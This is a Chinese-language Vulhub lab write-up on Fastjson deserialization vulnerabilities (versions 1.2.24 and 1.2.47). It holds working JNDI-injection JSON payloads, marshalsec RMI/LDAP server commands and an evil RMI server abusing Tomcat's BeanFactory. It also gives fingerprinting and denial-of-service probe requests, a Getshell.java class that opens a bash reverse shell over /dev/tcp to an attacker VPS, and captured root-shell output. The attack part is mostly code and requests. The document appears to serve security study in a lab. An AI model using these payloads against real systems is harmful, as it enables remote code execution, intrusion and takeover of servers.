Vulhub 漏洞学习之:Fastjson
Vulhub 漏洞学习之:Fastjson
目录
0 背景知识
FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
0.1 FastJson POC解析
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit",""autoCommit":true}
注:因为jndi注入的利用受jdk版本影响较大,所以在利用的时候还是要多尝试的,可通过dnslog先确定一下漏洞是否存在。
0.1.1 基于rmi的利用方式
适用jdk版本:JDK 6u132, JDK 7u122, JDK 8u113之前。
利用方式:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8080/test/#Exploit
0.1.2 基于ldap的利用方式
适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。
利用方式:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8080/test/#Exploitt
0.1.3 基于BeanFactory的利用方式
适用jdk版本:JDK 11.0.1、8u191、7u201、6u211以后。
利用前提:因为这个利用方式需要借助服务器本地的类,而这个类在tomcat的jar包里面,一般情况下只能在tomcat上可以利用成功。
利用方式:
public class EvilRMIServerNew {
public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1097");
Registry registry = LocateRegistry.createRegistry(1097);
//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','open /Applications/Calculator.app/']).start()\")"));
ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("Object", referenceWrapper);
}
}
0.2 判断目标系统是否使用 Fastjson
0.2.1 使用单"{"判断
- 无特殊配置情况下fastjson,无正确的闭合会报错,返回结果里有fastjson字样。
POST / HTTP/1.1
Host: 192.168.50.4:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
{
响应信息:
HTTP/1.1 400
Content-Type: text/html;charset=ISO-8859-1
Content-Language: zh-CN
Content-Length: 500
Date: Thu, 20 Apr 2023 21:29:13 GMT
Connection: close
<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Thu Apr 20 21:29:13 UTC 2023</div><div>There was an unexpected error (type=Bad Request, status=400).</div><div>JSON parse error: syntax error, expect {, actual error, pos 0, fastjson-version 1.2.45; nested exception is com.alibaba.fastjson.JSONException: syntax error, expect {, actual error, pos 0, fastjson-version 1.2.45</div></body></html>
0.2.2 使用DoS模式
-
fastjson在版本<1.2.60在取不到值的时候会填充\u001a,发生DOS,我们可以构造请求,通过响应延迟来判断是否使用的fastjson
-
{"a":"\x触发DOS,3s,和正常的和错误的请求响应时间28ms1差太多,由此来判断使用了fastjson解析器 -
请求报文:
POST / HTTP/1.1 Host: 192.168.50.4:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 Content-Type: application/json Content-Length: 8 {"a":"\x- 请求报文中要有请求头:
Content-Type: application/json
- 请求报文中要有请求头:
-
响应报文:主要看响应时间:此处大概需要2-3s。
HTTP/1.1 400 Content-Type: text/html;charset=ISO-8859-1 Content-Language: zh-CN Content-Length: 394 Date: Thu, 20 Apr 2023 22:01:51 GMT Connection: close <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Thu Apr 20 22:01:51 UTC 2023</div><div>There was an unexpected error (type=Bad Request, status=400).</div><div>JSON parse error: Java heap space; nested exception is com.alibaba.fastjson.JSONException: Java heap space</div></body></html>
0.2.3 dnslog回显
-
1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}POST / HTTP/1.1 Host: 192.168.50.4:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 Content-Type: application/json Content-Length: 66 {"zeo":{"@type":"java.net.Inet4Address","val":"ccxzt8.dnslog.cn"}} -
1.2.67版本后
{"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"} -
畸形的
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
1 Fastjson 反序列化导致任意命令执行漏洞
Fastjson允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名。Fastjson自定义的反序列化机制时会自动调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑,则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。
1.1 环境安装
1.2 漏洞利用过程
-
首先编译并上传命令执行代码,将Getshell.java编译生成Getshell.class类:如
http://YourIP/Getshell.class:// Getshell.java import java.lang.Runtime; import java.lang.Process; public class Getshell { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"bash", "-c", "bash -i>& /dev/tcp/192.168.210.10/2333 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } } // 编译Getshell.java得到Getshell.class javac Getshell.java // 将生成的Getshell.class上传至远程下载服务器,如你的VPS中 -
打包好的EXP,启动一个RMI服务器,监听9999端口,并制定加载远程类
Getshell.class:java -cp target\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://Your-IP/#Getshell" 9999 * Opening JRMP listener on 9999 -
远程VPS(192.168.210.10)监听2333端口
$ nc -nvlp 2333 listening on [any] 2333 ...
1.3 Fastjson 1.2.24 GetShell
因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。
-
向目标靶机发送Payload
POST / HTTP/1.1 Host: 192.168.210.13:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 159 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.210.10:9999/Getshell", "autoCommit":true } } -
成功getshell
nc -nvlp 2333 listening on [any] 2333 ... connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 32906 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@f01ec0f18266:/# id id uid=0(root) gid=0(root) groups=0(root)
1.4 Fastjson 1.2.47 Getshell
- fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
- 目标环境是
openjdk:8u102,这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以简单利用RMI进行命令执行。
-
向目标靶机发送Payload
POST / HTTP/1.1 Host: 192.168.210.13:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 257 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.210.10:9999/Getshell", "autoCommit":true } } -
成功Getshell
$ nc -nvlp 2333 listening on [any] 2333 ... connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 32906 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@886933ecdafe:/# id id uid=0(root) gid=0(root) groups=0(root)
